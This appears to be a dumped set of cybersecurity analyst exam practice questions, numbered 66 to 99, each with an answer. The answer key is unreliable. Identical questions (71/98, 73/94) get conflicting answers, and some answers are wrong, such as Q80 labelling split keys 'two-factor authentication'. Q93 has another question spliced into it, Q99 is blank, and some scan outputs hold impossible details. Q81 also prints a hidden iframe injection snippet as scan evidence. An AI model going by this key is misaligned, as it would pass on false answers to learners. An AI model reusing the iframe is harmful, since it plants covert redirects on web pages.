The help desk informed a security a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files: Locky.js xerty.ini xerty.lib Further analyst indicates that when the .zip file is opened, it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices? A Disable access to the company VPN B Move the files from the NAS to a cloud-based strong solution C Set permissions on file shares to read-only D Add the URL included in the .js file to the company’s web proxy filter

Answer 66

D Add the URL included in the .js file to the company’s web proxy filter

Question 67

A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops. Which of the following tools would appropriate to use in this case? A MSBA B SHA1sum C FIM D DLP

Answer 67

C FIM

Question 68

After reading about data breaches at a competing company, senior leaders in an organization have grown increasingly concerned about social engineering attacks. They want to increase awareness among staff regarding this threat, but do not want to use traditional training methods because they these methods as ineffective. Leadership wants to focus particular attention on potential attackers’ use of reconnaissance techniques and information gathering attempts. Which of the following approaches would BEST meet the requirements? A Classroom training on the dangers of social media followed by a test and gift certificates for employee getting a perfect score B Simulated phishing emails asking employees to reply to the email with their updated phone number and office location C A poster contest to raise awareness of PII and asking employees to provide examples of data breaches and consequences D USB drives randomly placed inside and outside the organization that contain a pop-up warning to any users who plug the drive into their computer

Answer 68

D USB drives randomly placed inside and outside the organization that contain a pop-up warning to any users who plug the drive into their computer

Question 69

During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test and questioned the legitimacy of the term. Which of the following should be shown to the officer? A Letter of engagement B Scope of work C Timing information D Team reporting

Answer 69

B Scope of work

Question 70

As part of its SDLC, an organization scans all new applications for the OWASP Top 10 vulnerabilities. A new application shows no vulnerabilities via this process and is placed into production. An independent penetration test identifies several network layer vulnerabilities. Which of the following is the MOST likely cause? A The vulnerability scanner should have utilized a credentialed scan. B The OWASP Top does not include methods to detect this class of vulnerability. C The scanner cannot see the traffic used by the application because it is configured to use SSL/TLS. D The application is not subject to PCI, so it doesn’t need to be scanned at the network Layer.

Answer 70

B The OWASP Top does not include methods to detect this class of vulnerability.

Question 71

An organization suspects it has had a breach, and it is trying to determine the potential impact. The organization knows the following: ● The source of the breach is linked to an IP located in a foreign country. ● The breach is isolated to the research and development servers. ● The hash values of the data before and after the breach are unchanged. ● The affected servers were regularly patched, and a recent scan showed no vulnerabilities. Which of the following conclusions can be drawn with respect to the threat and impact? (Select TWO) A The confidentiality of the data is unaffected. B The threat is an APT. C The source IP of the threat has been spoofed. D The integrity of the data is unaffected. E The threat is an insider.

Answer 71

B The threat is an APT. D The integrity of the data is unaffected.

Question 72

A security analyst is monitoring authentication exchanges over the company’s wireless network. A sample of the Wireshark output is shown below: No Time Source Destination Protocol Info 1345 191.12345 Cisco_91:aa Netgear_a5:ef EAP Request, Identify 1350 191.12456 Netgear_a5:ef Cisco_91:aa EAP Response, Identify 1355 191.12678 Cisco_91:aa Netgear_a5:ef EAP Request, LEAP 1360 191.12890 Netgear_a5:ef Cisco_91:aa TLSv1.1 Client Hello …. 2145 193.12345 fooHost barServer TCP GET ./login.jsp 2150 193.12456 barServer TCP TCP Source port:80 … Which of the following would improve the security posture of the wireless network? A Using PEAP instead of LEAP B Using SSL 2.0 instead of TLSv1.1 C Using .aspx instead of.jsp D Using UDP instead of TCP

Answer 72

A Using PEAP instead of LEAP

Question 73

In reviewing service desk requests, management has requested that the security analyst investigate the requests submitted by the new human resources manager. The requests consist of “unlocking” files that belonged to the pervious human resources manager. The security analyst has uncovered a tool that is used to display file-level passwords. This tool is being used by several members of the service desk to unlock files. The content of these particular files is highly sensitive information pertaining to personnel. Which of the following BEST describes this scenario? (Select TWO) A Unauthorized data exfiltration B Unauthorized data masking C Unauthorized access D Unauthorized software E Unauthorized controls

Answer 73

A Unauthorized data exfiltration C Unauthorized access

Question 74

A user received an invalid password response when trying to change the password. Which of the following policies could explain why the password is invalid? A Access control policy B Account management policy C Password policy D Data ownership

Answer 74

C Password policy

Question 75

Nmap done: 1 IP address ( 1host up) scanned in 0.822 seconds Starting Nmap 4.11 (http://nmap.org) at 2011-11-03 18:34 EDT Interesting ports on host adminServer (192.168.1.1.15): PORT STATE SERVICE 22/tcp open ssh 139/tcp open netbios-ssn 3306/tcp open mysql Service detection performed. Nmap done: 1 IP address (1 host up) scanned in 0.822 seconds Starting Nmap 4.11 (http://nmap.org) at 2011-11-03 18:35 EDT Interesting ports on host opsServer (192.168.1.16): PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 1417/tcp open OpenSSh Service detection performed. Nmap done: 1IP address (1 host up) scanned in 0.822 seconds Which of the following servers is out of compliance? A finServer B adminServer C orgServer D opsServer

Answer 75

D opsServer

Question 76

An analyst is conducting a log review and identifies the following snippet in one of the logs: Jun 10 07:09:10 databse1 sshd [24665] : Invalid user root from 101.79.130.213 Jun 10 07:36:03 databse1 sshd [24901] : Invalid user root from 101.79.130.213 Jun 10 07:42:44 databse1 sshd [24938] : Invalid user root from 101.79.130.213 Jun 10 07:56:11 databse1 sshd [26570] : Invalid user root from 101.79.130.213 Jun 10 08:02:55 databse1 sshd [30144] : Invalid user root from 101.79.130.213 Which of the following MOST likely caused this activity? A SQL injection B Privilege escalation C Forgotten Password D Brute force

Answer 76

D Brute force

Question 77

An organization has a practice of running some administrative services on non-standard ports as a way of frustrating any attempts at reconnaissance. The output of the latest scan on host 192.168.1.13 is shown below: Starting Nmap 4.67 (http://nmap.org) at 2011-11-03 18:32 EDT Nmap scan report for 192.168.1.13 Host is up (0.00066s latency). Not shown: 990 closed ports PORT STATE SERVICE 23/tcp open ssh 111/tcp open rpcbind 139/tcp open netbios-ssn 1417/tcp open OpenSSH 3306/tcp open mysql MAC Address : 01:AA:FB:23:21:45 Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds Which of the following statements is true? A Running SSH on the Telnet Port will now be sent across an unencrypted port. B Despite the result of the scan, the service running on port 23 is actually telnet and not SSH, and creates an additional vulnerability. C Running SSH on port 23 provides little additional security from running it on the standard port. D Remote SSH connections will automatically default to the standard SSH port. E. The use of OpenSSH on its default secure port will supersede any other remote connection attempts.

Answer 77

C Running SSH on port 23 provides little additional security from running it on the standard port.

Question 78

A cybersecurity analyst is currently checking a newly deployed server that has an access control list applied. When conducting the scan, the analyst received the following code snippet of results: Mail Server1 Trying 192.168.2.2 Connected Get/HTTP/1.0 HTTP: 1.0 200 Document follows Server: server/0.10 Connection: close Set-cookie: testing=1; path=/ Which of the following describes the output of the scan? A The analyst has discovered a false Positive, and the status code is incorrect providing an OK message. B The analyst has discovered a True Positive, and the status code is correct providing a file not found error message. C The analyst has discovered a True Positive, and the status code is incorrect providing a forbidden message. D The analyst has discovered a False Positive, and the status code is incorrect providing a server error message.

Answer 78

A The analyst has discovered a false Positive, and the status code is incorrect providing an OK message.

Question 79

Employees at a manufacturinng plant have been victims of spear phishing, but security solutions prevented further intrusions into the network. Which of the following is the MOST appropriate solution in this scenario? A Continue to monitor security devices. B Update antivirus and malware definitions. C Provide security awareness training. D Migrate email services to a hosted environment.

Answer 79

C Provide security awareness training.

Question 80

A security analyst received an email with the following key: Xj3XJ3LLc A second security analyst received an email with the following key: 3XJ3xjcLLC The security manager has iformed the two analysts that the email they received is a key that allows access to the company’s financial segment for maintenance. This is an example: A dual control B private key encryption C separation of duties D public key encryption E two-factor authentication

Answer 80

E two-factor authentication

Question 81

A cybersecurity was asked to review several results of web vulnerability scan logs. Given the following snippet of code: Iframe src=”http//65.240.22.1” width=”0” height=”0” frmeborder=”0” tabindex=”-1” title=”empty” style=visibility:hidden; display:none/iframe Which of the following BEST describes the situation and recommendations to be made? A The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name. B. The security analyst has discovered an embedded iframe that is hidden from user accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present. C The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page. D The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.

Answer 81

C The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.

Question 82

A security analyst positively identified the threat, vulnerability, and remediation. The analyst is ready to implement the corrective control. Which of the following would be the MOST inhibiting to applying the fix? A Requiring a firewall reboot B Resetting all administrator password C Business process interruption D Full desktop backups

Answer 82

C Business process interruption

Question 83

The board of directors made the decision to adopt a cloud-first strategy. The current security infrastructure was designed for on-premises implementation. A critical application that is subject to the Federal Information Security Management Act (FISMA) of 2002 compliance has been identified as a candidate for a hybrid cloud deployment model. Which of the following should be conducted FIRST? A Develop a request for proposal B Perform a risk assessment C Review current security controls D Review the SLA for FISMA compliance

Answer 83

B Perform a risk assessment

Question 84

The development team recently moved to a new application into production for the accounting department. After this occurred, the chief information officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporation’s quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring? A Security regression testing B User acceptance testing C Input validation testing D static code testing

Answer 84

B User acceptance testing

Question 85

A human resources employee sends out a mass email to all employees that contains their personnel records. A security analyst is called in to address the concern of the human resources director on how to prevent this from happening in the future. Which of the following would be the BEST solution to recommend to the director? A Install a data loss prevention system, and train human resources employees on its use. Provide Pll training to all employees at the company. Encrypt Pll information. B Enforce encryption on all emails sent within the company. Create a Pll program and policy on how to handle data Train all human resources employees. C Train all employees. Encrypt data sent on the company network. Bring in privacy personnel to present a plan on how Pll should be handled. D Install specific equipment to create a human resources policy that protects Pll data. Train company employees on how to handle Pll data. Outsource all Pll to another company. Send the human resources director to training for Pll handling.

Answer 85

A Install a data loss prevention system, and train human resources employees on its use. Provide Pll training to all employees at the company. Encrypt Pll information.

Question 86

A software engineer has resigned and given two weeks’ notice. The organization is concerned the engineer may have taken proprietary code. Which of the following will BEST help the security analysts to determine if any code has been exfiltrated? A Terminate and immediately escort the engineer out of the building. B Develop a timeline of the engineer’s system and network activity. C Investigate when projects were checked out of the code repository by the engineer. D Dump the contents of RAM from the engineer’s workstation and review.

Answer 86

B Develop a timeline of the engineer’s system and network activity.

Question 87

During an investigation, an incident responder intends to recover multiple pieces of digital media. Before removing the media, the responder should initiate: A malware scans B secure communication C chain of custody forms D decryption tools

Answer 87

C chain of custody forms

Question 88

A security analyst receives a mobile device with symptoms of a virus infection. The virus is morphing whenever it is moved from sandbox to sandbox to analyze. Which of the following will help to identify the number of variations through the analysis life cycle? A Journaling B Hashing utilities C Log viewers D OS and process analysis E IOC tagging

Answer 88

E IOC tagging

Question 89

A company wants to replace its existing security infrastructure, including the firewall, IPS, and vulnerability scanner. A demo scanner from the new vendor is deployed. The analyst scans a device with the demo and legacy scanners and compares the results: Vulnerability Legacy Scanner Demo Scanner Chrome <44.3.1532.34 X Chrome <43.7.9786.72 X Adobe Reader < 10 X Microsoft SMB Remote Code Execution X X Apache < 2.4 X X Which of the following is MOST likely responsible for the discrepancy in results? A The demo scanner needs to be configured to run a credentialed scan. B The demo scanner needs to be configured as an exception in the IPS. C The demo scanner is cloud-based and cannot identify local vulnerabilities. D The legacy scanner is producing false positives and should be replaced.

Answer 89

A The demo scanner needs to be configured to run a credentialed scan.

Question 90

An analyst was investigating an attack that place on the network. A user was able to access the system without proper authentication. Which of the following will the analyst recommend, related to management approaches, in order to control access? (Select THREE) A RBAC B LEAP C DAC D PEAP E MAC F SCAP G BCP

Answer 90

A RBAC C DAC E MAC

Question 91

The security team for a large, international organization is developing a vulnerability management program. The development staff has expressed concern that the new program will cause service interruptions and downtime as vulnerabilities are remedied. Which of the following should the Security team implement FIRST as a component of the remediation process to address this concern? A Automated patch management B Change control procedures C Security regression testing D Isolation of vulnerable servers

Answer 91

C Security regression testing

Question 92

A worm was detected on multiple PCs within a remote office. The security analyst recommended that the remote office be blocked from the corporate network during the incident response. Which of the following processes BEST describe this recommendation? A Logical isolation of the remote office B Sanitization of the network environment C Segmentation of the network D Secure disposal of affected systems

Answer 92

A Logical isolation of the remote office

Question 93

A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed and if a false positive occurred. False Positive Findings Listing 1 Critical (10.0) 12209 Security Update for Microsoft Windows (835732) Critical (10.0) 13852 Microsoft Windows Task Scheduler Remote Overflow (841873) Critical (10.0) 18502 Vulnerability in SMB Could Allow Remote Code Execution (896422) Critical (10.0) 58662 Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows (20161146) Critical (10.0) 19407 Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) False Positive Findings Listing 2 Critical (10.0) 19407 Vulnerability in Printer Spooler Spooler Service Could Allow Remote Code Execution (896423) Critical (10.0) 11890 Ubuntu 5.04 / 5.10 / 6.06 LTS : Buffer Overrun in Messenger Service (CVE-2016-8035) Critical (10.0) 27942 Ubuntu 5.04 / 5.10 / 6.06 LTS : php5 vulnerabilities (CVE-2016-362-1) Critical (10.0) 27978 Ubuntu 5.10 /6.06 LTS / 6.10 :gnupg vulnerability (CVE-2016-3931) Critical (10.0) 28017 Ubuntu 5.10 /6.06 LTS / 6.10 : php5 regression (CVE-2016-4242) False Positive Findings Listing 3 WARNING (1.0.1) System cryptography: Force strong key protection for user keys stored on the computer: Prompt the User each time a key is first used INFORM (1.2.4) Network access: Do not Allow anonymous enumeration of SAM accounts: Enabled INFORM (1.2.4) Network access: Do not Allow anonymous enumeration of SAM accounts and shares: Enabled INFORM (1.5.0) Network access: Let Everyone permissions apply to anonymous users: Disabled INFORM (1.6.5) Network access: Sharing and security model for local accounts: classic – local users authenticate as themselves The help desk informed a security a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files: Locky.js xerty.ini xerty.lib Further analyst indicates that when the .zip file is opened, it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices? A Disable access to the company VPN B Move the files from the NAS to a cloud-based strong solution C Set permissions on file shares to read-only D Add the URL included in the .js file to the company’s web proxy filter

Answer 93

D Add the URL included in the .js file to the company’s web proxy filter

Question 94

In reviewing service desk requests, management has requested that the security analyst investigate the requests submitted by the new human resources manager. The requests consist of “unlocking” files that belonged to the pervious human resources manager. The security analyst has uncovered a tool that is used to display file-level passwords. This tool is being used by several members of the service desk to unlock files. The content of these particular files is highly sensitive information pertaining to personnel. Which of the following BEST describes this scenario? (Select TWO) A Unauthorized data exfiltration B Unauthorized data masking C Unauthorized access D Unauthorized software E Unauthorized controls

Answer 94

C Unauthorized access D Unauthorized software

Question 95

A Cybersecurity analyst is capturing an image of a machine that is possibly infected web malware. During which of the following incident response phases does that occur? A Eradication B Analysis C Recovery D Post-inciden

Answer 95

B Analysis

Question 96

An analyst suspects large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST. A Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated. B Draft and publish a notice on the company’s website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data. C Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted. D Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

Answer 96

D Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

Question 97

A security administrator has uncovered a covert channel used to exfiltrate confidential data from an internal database server through a compromised corporate web server. Ongoing exfiltration is accomplished by embedding a small amount of data extracted from the database into the metadata of images served by the web server. File timestamps suggest that the server was initially compromised six months ago using a common server misconfiguration. Which of the following BEST describes the type of threat being used? A APT B Zero-day attack C Man-in-the-middle attack D XSS

Answer 97

A APT

Question 98

An organization suspects it has had a breach, and it is trying to determine the potential impact. The organization knows the following: ● The source of the breach is linked to an IP located in a foreign country. ● The breach is isolated to the research and development servers. ● The hash values of the data before and after the breach are unchanged. ● The affected servers were regularly patched, and a recent scan showed no vulnerabilities. Which of the following conclusions can be drawn with respect to the threat and impact? (Select TWO) A The confidentiality of the data is unaffected. B The threat is an APT. C The source IP of the threat has been spoofed. D The integrity of the data is unaffected. E The threat is an insider.

Answer 98

A The confidentiality of the data is unaffected. D The integrity of the data is unaffected.

Question 99

Answer 99